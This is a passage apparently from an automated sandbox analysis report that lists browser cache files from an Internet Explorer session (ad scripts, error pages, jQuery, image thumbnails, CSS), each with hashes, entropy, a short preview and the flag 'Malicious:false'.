                                                    Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":77,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"ussyncmap":[],"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"http
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\checksync[2].htm
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:HTML document, ASCII text, with very long lines
                                                    Category:dropped
                                                    Size (bytes):21552
                                                    Entropy (8bit):5.3052221077615584
                                                    Encrypted:false
                                                    SSDEEP:384:gIAGcVXlblcqnzleZSweg2f5ng+7naMHF3OZOHQWwY4RXrqt:R86qhbS2RpF3OsHQWwY4RXrqt
                                                    MD5:D0E1F91215881E5FA53C3B18262A9DFE
                                                    SHA1:B8C86EC6E6E94F5104E9A60DD286BC2E9F50C3BE
                                                    SHA-256:26A91F854D0E89589A8018D507B38F21CD27094E38F1894F215AEF20144D618B
                                                    SHA-512:01F394424DDA7F38B8978643C452B784144103D6E36C001B8B0DB70926C0577F75FBB5EE0EE7235B8582CDBFC3117E2ECFA8AF8A4DCCB72B1BE9FD6D4E040B0B
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":77,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"ussyncmap":[],"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"http
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\dnserror[1]
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                    Category:downloaded
                                                    Size (bytes):2997
                                                    Entropy (8bit):4.4885437940628465
                                                    Encrypted:false
                                                    SSDEEP:48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
                                                    MD5:2DC61EB461DA1436F5D22BCE51425660
                                                    SHA1:E1B79BCAB0F073868079D807FAEC669596DC46C1
                                                    SHA-256:ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
                                                    SHA-512:A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:res://ieframe.dll/dnserror.htm?ErrorStatus=0x800C0008
                                                    Preview: .<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\e151e5[1].gif
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:GIF image data, version 89a, 1 x 1
                                                    Category:downloaded
                                                    Size (bytes):43
                                                    Entropy (8bit):3.122191481864228
                                                    Encrypted:false
                                                    SSDEEP:3:CUTxls/1h/:7lU/
                                                    MD5:F8614595FBA50D96389708A4135776E4
                                                    SHA1:D456164972B508172CEE9D1CC06D1EA35CA15C21
                                                    SHA-256:7122DE322879A654121EA250AEAC94BD9993F914909F786C98988ADBD0A25D5D
                                                    SHA-512:299A7712B27C726C681E42A8246F8116205133DBE15D549F8419049DF3FCFDAB143E9A29212A2615F73E31A1EF34D1F6CE0EC093ECEAD037083FA40A075819D2
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:https://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
                                                    Preview: GIF89a.............!.......,...........D..;
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\errorPageStrings[1]
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                    Category:downloaded
                                                    Size (bytes):4720
                                                    Entropy (8bit):5.164796203267696
                                                    Encrypted:false
                                                    SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                                                    MD5:D65EC06F21C379C87040B83CC1ABAC6B
                                                    SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                                                    SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                                                    SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:res://ieframe.dll/errorPageStrings.js
                                                    Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\httpErrorPagesScripts[1]
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):12105
                                                    Entropy (8bit):5.451485481468043
                                                    Encrypted:false
                                                    SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                                                    MD5:9234071287E637F85D721463C488704C
                                                    SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                                                    SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                                                    SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\http___cdn.taboola.com_libtrc_static_thumbnails_473ae3d59c5a5d6ebb789fc52267b3de[1].jpg
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
                                                    Category:downloaded
                                                    Size (bytes):13854
                                                    Entropy (8bit):7.960413420462163
                                                    Encrypted:false
                                                    SSDEEP:384:pHKVu8MqBqVecPM4ZsOTOsKf1T/DT5+RPcHZ5EiT:pHVneBShTODZ/DT5+MZ5nT
                                                    MD5:F9540C95FB896862FF39C70D74C8C815
                                                    SHA1:62BB66850D1B207C7519763E0C05608C258CD33B
                                                    SHA-256:9270B2255FABED04B45DEFD4E54E07E242AB0737A3C3A351B0780C9003920C04
                                                    SHA-512:BD13E2B6F9783F036D598472555A52F7D57064DC8531CF9638265B80FA93274712B57FC9C4F572EA9439E374D457D6AD7E2241BD0E65BA1AAF5CDFFFB7AA94C6
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%2Cg_xy_center%2Cx_1548%2Cy_2688/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F473ae3d59c5a5d6ebb789fc52267b3de.jpg
                                                    Preview: ......JFIF.....................................................................&""&0-0>>T......................$.....$6"(""("60:/,/:0VD<<DVdTOTdylly............7...............5.........................................................................K....1.....y:.l.....}{..C.0...%,..(DF=Xa.......C....H........`C..a...D1..!..q...0......J.bb0L.b.C.C.....G..8..6.*.&\...L@0...F.`.8.......'.:.)..(..j5c.........D". ...oq...tV@.bzk...Ku.........!....C.j..x.f._.sp2..%.....+.8 C.Y..<;).aP.B..3.....q...1...22.........#...#"...:bIc....U*..Ly,u.A...R")...PR4.y.vw.....FFc.y-.........+F..l.9.%.r...vs..R.f**.61..l.W&..Lej&T..2q......V:...............LX.uQH.nh....s......Fp..ec`....}j.tx.b.dEA."....Z....Y..g.\*o.........b*.......9(C.Sk.6`l...t..K...qt.../..l.U`.PH.a.D....Q..L:.d..*....F.QXI.]|.a..*s....N.Nv.;......c./e..if..c.Y.....s..m.q1..T....6.Cb..!...x...(.]bZ.r..$`..ts..F8..DD.h.R.....F!....Hkn.V......F1.Uk.....!.8b."k....jB.........2"2.AB...$.`.]f..K.V.i.J1K.(.
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\http___cdn.taboola.com_libtrc_static_thumbnails_705322f466ee4e70b10d73d39074748e[1].jpg
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
                                                    Category:downloaded
                                                    Size (bytes):5327
                                                    Entropy (8bit):7.897539434889785
                                                    Encrypted:false
                                                    SSDEEP:96:ZvXg3lDeKX7cq6/VLIu6c7dt/aI3IKuH6CLcA6c6zkFoSt:ZvQ3Jcbmu6cSI3IKuHAc6mV
                                                    MD5:BAAA7E036D2C2AA17EA230A3CF709974
                                                    SHA1:55D26D8847212159A01C47CB11A71367ED498671
                                                    SHA-256:92DAA66C6F1FB1F4D59DAC2797ACC31CC45299990F3E5AA591A2B2C22BEDB5DF
                                                    SHA-512:BB9C186BCAAB1954C146E2DDBDC7B8539699465E2062223F8934C971691F5BB4BBE9944A07B22A290D9CF028BEDA49CDFA4B43B0C45206466DA272F79BEBA710
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F705322f466ee4e70b10d73d39074748e.jpg
                                                    Preview: ......JFIF..........................................................+".."+2*(*2<66<LHLdd.............................................+".."+2*(*2<66<LHLdd.......7...."..........5...................................................................,e..+.0.Sn.2...LY..4..<.>k..Z;.........UI...&...B....).U.L%#+.)J...F...f<.7T.R...I...`f.-5.'.n..T`.. S.b.I...;^v.S^sC].;..p.EHD.%1..+......,B..cQN..y <...F".&..(..fa...&...Y.cy&...)7mT.Q*.D..K..-.P.@.!.geT....Q-..f...Z.....|.K....;.8.UM.6.4....#..m...y..S:.....1oJ.?....hm..Dh.P.t.N.B.M.c.;...l.!......h...x..&.J.#\....k...w..].abZ.4...1....u.V.....xz...Ld..F.J.D..n.l...g.q.`.W!k;.S..F..*.....n..X..'.t.h.p..........~..s.....HnRWR%.......H..GI.(...9..,.g.7.....]...Y..gjJ.J.)WI...A.... ...A...K.__....*(..0.....X..y.y.W...%$.y......=^...|o.em|}...JPLu.D...Z...|...W3...<.e.IIE63....5].gY........=..y0jo:&.;.G.s..(.F5....7Cd...cO.^d}0y.......F..Pr.i....._c..-..BVx.S......J.......km..T..4...x.......#.:....V....]./L.5..*....
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\http___cdn.taboola.com_libtrc_static_thumbnails_GETTY_IMAGES_SKP_1024817754__XfRtGeKb[1].jpg
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
                                                    Category:downloaded
                                                    Size (bytes):17316
                                                    Entropy (8bit):7.910298786011498
                                                    Encrypted:false
                                                    SSDEEP:384:KGcOOO2n80PP9bG2Io+Ry3dL3NhKpPKhUQYURjpQK0s:KuiNCbRIdrrAihYway
                                                    MD5:F76CBF59F82973371C2CE7DD15ED4589
                                                    SHA1:328604D9E59280824F0F1C974D7A5A7C6C850A2B
                                                    SHA-256:2356B173163DAB414255F656C2270B45297C49FE8A989815DB6D64B3F02E7D6B
                                                    SHA-512:7C243F60A999CAAB107D0DEC2F00DBA1E30FE3A0D3A77835A78FD6377B539A42A9775574AD276774518CB5E099F01B3B5752E8B459AB7F56E44408F77478B58F
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2FGETTY_IMAGES%2FSKP%2F1024817754__XfRtGeKb.jpg
                                                    Preview: ......JFIF.............@ICC_PROFILE......0ADBE....mntrRGB XYZ ............acspAPPL....none...........................-ADBE................................................cprt.......2desc...0...kwtpt........bkpt........rTRC........gTRC........bTRC........rXYZ........gXYZ........bXYZ........text....Copyright 1999 Adobe Systems Incorporated...desc........Adobe RGB (1998)................................................................................XYZ .......Q........XYZ ................curv.........3..curv.........3..curv.........3..XYZ ..........O.....XYZ ......4....,....XYZ ......&1.../...............................................................&""&0-0>>T......................$.....$6"(""("60:/,/:0VD<<DVdTOTdylly............7...............6..................................................................y..~..>...V..C..C.$p..R\..-r...Q.MP...Q...W....6...jVm...A.2K..tM....).-.Z..*..G.lj1.qM3.qzl.....J.....Y.7*..P..N..0.O1J...*Z.R<.EL_L.zg......B..%..{r.q....b.%...
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\http___cdn.taboola.com_libtrc_static_thumbnails_c98d021d67b7e64fe29e539f62f002ad[1].jpg
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 1
                                                    Category:downloaded
                                                    Size (bytes):9577
                                                    Entropy (8bit):7.9516292979757
                                                    Encrypted:false
                                                    SSDEEP:192:4KTuL27HrlustoJhKL/Se0hpxZJKFbQ5pfHhq9poBoYYgCt+9:rP7HrYstoJu/q5oYYLS
                                                    MD5:DD6FC4F19195A0931A12CDD9B0BFBFEA
                                                    SHA1:BE6DAA794824E465BE9327BF9C08038D7B664255
                                                    SHA-256:CB0E5D530D921AB4DB1D4F5C2C50DA232478A36692F7DC87C116CA1D0B8481FB
                                                    SHA-512:6F733CFCE90217D6312AA332DDB9F1AC3E981DAFCBC3B0E0A0679504CD9419AD624CF837B089B750A7FCC1876A6A0CA225C403C87319BC0392E1CE237D358DAF
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Fc98d021d67b7e64fe29e539f62f002ad.jpg
                                                    Preview: ......JFIF.............C.......................................................&""&0-0>>T......7..................................................................B ...nA...w.^......W..0.'F...GH....(.[}<..x..s<....<O/.a{....&.7........,x...Io..z?.;..P..cX|<.....|.p...-.|.=..j]K..+.....#B.(..`V..S.V>Y.......{.e$..JNe..S._..o....ho...P.Y%..K.V...7.k............M....z.&../.k.o.i9......0..:t..a<.:o[..R7.L...7J..BI&.#.w'.....w^..a.i.qZHSJM#`...$.O`.....X.N.gO.{....-6r.:P.)`&Tz.\.%......Id.Z...4........y32.-8JdhZ.*Fh.........l...rO,s....oqV....*....f..NE$d......{V..9_..(a....:2..2Xl...y}?....26.Yz..2..IG1.....K..)2t$.UW...ME,....S.gs..~......{.s.3......4.s.n.3#....'K.......9.5..C..m.........b}......._..S.1....<k...[.^.3.)...m..l.D..o.s.A...k..9..8].'.)...R...........................3............................!..1A.. "Qa..02p$@BSq.................E..._tX....w_{X.U=._..j..'s....F..J....g..C.k..m...3.e...H).......k.E..N.3..h..9...r./.&h.1..Oz..H.
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\jquery-2.1.1.min[1].js
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:ASCII text, with very long lines, with CRLF line terminators
                                                    Category:downloaded
                                                    Size (bytes):84249
                                                    Entropy (8bit):5.369991369254365
                                                    Encrypted:false
                                                    SSDEEP:1536:DPEkjP+iADIOr/NEe876nmBu3HvF38NdTuJO1z6/A4TqAub0R4ULvguEhjzXpa9r:oNM2Jiz6oAFKP5a98HrY
                                                    MD5:9A094379D98C6458D480AD5A51C4AA27
                                                    SHA1:3FE9D8ACAAEC99FC8A3F0E90ED66D5057DA2DE4E
                                                    SHA-256:B2CE8462D173FC92B60F98701F45443710E423AF1B11525A762008FF2C1A0204
                                                    SHA-512:4BBB1CCB1C9712ACE14220D79A16CAD01B56A4175A0DD837A90CA4D6EC262EBF0FC20E6FA1E19DB593F3D593DDD90CFDFFE492EF17A356A1756F27F90376B650
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:https://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquery-2.1.1.min.js
                                                    Preview: /*! jQuery v2.1.1 | (c) 2005, 2014 jQuery Foundation, Inc. | jquery.org/license */..!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l=a.document,m="2.1.1",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return n.each(this,a,b)},map:function(a){return this.pushStack(n.map(this,funct
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\nrrV32971[1].js
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):89990
                                                    Entropy (8bit):5.421042743937174
                                                    Encrypted:false
                                                    SSDEEP:1536:uVnCuukXGs7RiUGZFVgG5d5HI//EU5ZhEpu6BRaFuv14YYLcE5afSASrkp99oKj:+tiX/d5Hg7kuGu35afSZa
                                                    MD5:F713B332DA44B225112B0659ADD2255E
                                                    SHA1:77E4BE0012CFA615460C2F087B139AA00E1B24E5
                                                    SHA-256:75B521CFCD1C491395019519C23E94E22D5BCCBF54B902CD63CEAAF4D6D4B409
                                                    SHA-512:697179532C2B826F5FA855F7D98212B18A0784A96A91C0C36473D260D68AEBA31ADB7206679AEFB2C67BCB84B6740131504B2DBF794431AE55D4B2F65D19567E
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:https://contextual.media.net/48/nrrV32971.js
                                                    Preview: var _mNRequire,_mNDefine;!function(){"use strict";var c={},u={};function a(e){return"function"==typeof e}_mNRequire=function e(t,r){var n,i,o=[];for(i in t)t.hasOwnProperty(i)&&("object"!=typeof(n=t[i])&&void 0!==n?(void 0!==c[n]||(c[n]=e(u[n].deps,u[n].callback)),o.push(c[n])):o.push(n));return a(r)?r.apply(this,o):o},_mNDefine=function(e,t,r){if(a(t)&&(r=t,t=[]),void 0===(n=e)||""===n||null===n||(n=t,"[object Array]"!==Object.prototype.toString.call(n))||!a(r))return!1;var n;u[e]={deps:t,callback:r}}}();_mNDefine("modulefactory",[],function(){"use strict";var r={},e={},o={},i={},t={},n={},a={},d={},c={},l={};function g(r){var e=!0,o={};try{o=_mNRequire([r])[0]}catch(r){e=!1}return o.isResolved=function(){return e},o}return r=g("conversionpixelcontroller"),e=g("browserhinter"),o=g("kwdClickTargetModifier"),i=g("hover"),t=g("mraidDelayedLogging"),n=g("macrokeywords"),a=g("tcfdatamanager"),d=g("l3-reporting-observer-adapter"),c=g("editorial_blocking"),l=g("debuglogs"),{conversionPixelCo
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\px[1].gif
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:GIF image data, version 89a, 1 x 1
                                                    Category:downloaded
                                                    Size (bytes):43
                                                    Entropy (8bit):3.0950611313667666
                                                    Encrypted:false
                                                    SSDEEP:3:CUMllRPQEsJ9pse:Gl3QEsJLse
                                                    MD5:AD4B0F606E0F8465BC4C4C170B37E1A3
                                                    SHA1:50B30FD5F87C85FE5CBA2635CB83316CA71250D7
                                                    SHA-256:CF4724B2F736ED1A0AE6BC28F1EAD963D9CD2C1FD87B6EF32E7799FC1C5C8BDA
                                                    SHA-512:EBFE0C0DF4BCC167D5CB6EBDD379F9083DF62BEF63A23818E1C6ADF0F64B65467EA58B7CD4D03CF0A1B1A2B07FB7B969BF35F25F1F8538CC65CF3EEBDF8A0910
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:https://ad-delivery.net/px.gif?ch=1&e=0.68284771737118
                                                    Preview: GIF89a.............!.......,...........L..;
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\2d-0e97d4-185735b[1].css
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
                                                    Category:dropped
                                                    Size (bytes):251830
                                                    Entropy (8bit):5.293959849690048
                                                    Encrypted:false
                                                    SSDEEP:3072:FaPMULTAHEkm8OUdvUvIZkruq7pjD4tQH:Fa0ULTAHLOUdvvZkruq7pjD4tQH
                                                    MD5:0D5390B287153C5BCC63A7EB8F113949
                                                    SHA1:960A0F26EBEA4B8398001B4AA7B7C093A1BBBEDE
                                                    SHA-256:78364D0D1CF40414F559E73A3F706DF15944F8639179E55C07F6CAE0630DCC08
                                                    SHA-512:F0FFB3A1EE7AE4260D9832CBB67729F15BC8A5FA0939E09114E6B78809ABBA01A72FC2A6F06BFC09B59F91BCA41DA4B99F2B2E5E0E24142B1CD743C1A7FCF7CC
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: /*! Error: C:/a/_work/1/s/Statics/WebCore.Statics/Css/Modules/ExternalContentModule/Uplevel/Base/externalContentModule.scss(207,3): run-time error CSS1062: Expected semicolon or closing curly-brace, found '@include.multiLineTruncation' */....@charset "UTF-8";div.adcontainer iframe[width='1']{display:none}span.nativead{font-weight:600;font-size:1.1rem;line-height:1.364}div:not(.ip) span.nativead{color:#333}.todaymodule .smalla span.nativead,.todaystripe .smalla span.nativead{bottom:2rem;display:block;position:absolute}.todaymodule .smalla a.nativead .title,.todaystripe .smalla a.nativead .title{max-height:4.7rem}.todaymodule .smalla a.nativead .caption,.todaystripe .smalla a.nativead .caption{padding:0;position:relative;margin-left:11.2rem}.todaymodule .mediuma span.nativead,.todaystripe .mediuma span.nativead{bottom:1.3rem}.ip a.nativead span:not(.title):not(.adslabel),.mip a.nativead span:not(.title):not(.adslabel){display:block;vertical-align:top;color:#a0a0a0}.ip a.nativead .captio
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\2d-0e97d4-185735b[2].css
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
                                                    Category:dropped
                                                    Size (bytes):251830
                                                    Entropy (8bit):5.293959849690048
                                                    Encrypted:false
                                                    SSDEEP:3072:FaPMULTAHEkm8OUdvUvIZkruq7pjD4tQH:Fa0ULTAHLOUdvvZkruq7pjD4tQH
                                                    MD5:0D5390B287153C5BCC63A7EB8F113949
                                                    SHA1:960A0F26EBEA4B8398001B4AA7B7C093A1BBBEDE
                                                    SHA-256:78364D0D1CF40414F559E73A3F706DF15944F8639179E55C07F6CAE0630DCC08
                                                    SHA-512:F0FFB3A1EE7AE4260D9832CBB67729F15BC8A5FA0939E09114E6B78809ABBA01A72FC2A6F06BFC09B59F91BCA41DA4B99F2B2E5E0E24142B1CD743C1A7FCF7CC
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: /*! Error: C:/a/_work/1/s/Statics/WebCore.Statics/Css/Modules/ExternalContentModule/Uplevel/Base/externalContentModule.scss(207,3): run-time error CSS1062: Expected semicolon or closing curly-brace, found '@include.multiLineTruncation' */....@charset "UTF-8";div.adcontainer iframe[width='1']{display:none}span.nativead{font-weight:600;font-size:1.1rem;line-height:1.364}div:not(.ip) span.nativead{color:#333}.todaymodule .smalla span.nativead,.todaystripe .smalla span.nativead{bottom:2rem;display:block;position:absolute}.todaymodule .smalla a.nativead .title,.todaystripe .smalla a.nativead .title{max-height:4.7rem}.todaymodule .smalla a.nativead .caption,.todaystripe .smalla a.nativead .caption{padding:0;position:relative;margin-left:11.2rem}.todaymodule .mediuma span.nativead,.todaystripe .mediuma span.nativead{bottom:1.3rem}.ip a.nativead span:not(.title):not(.adslabel),.mip a.nativead span:not(.title):not(.adslabel){display:block;vertical-align:top;color:#a0a0a0}.ip a.nativead .captio
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\AAMtJDm[1].jpg
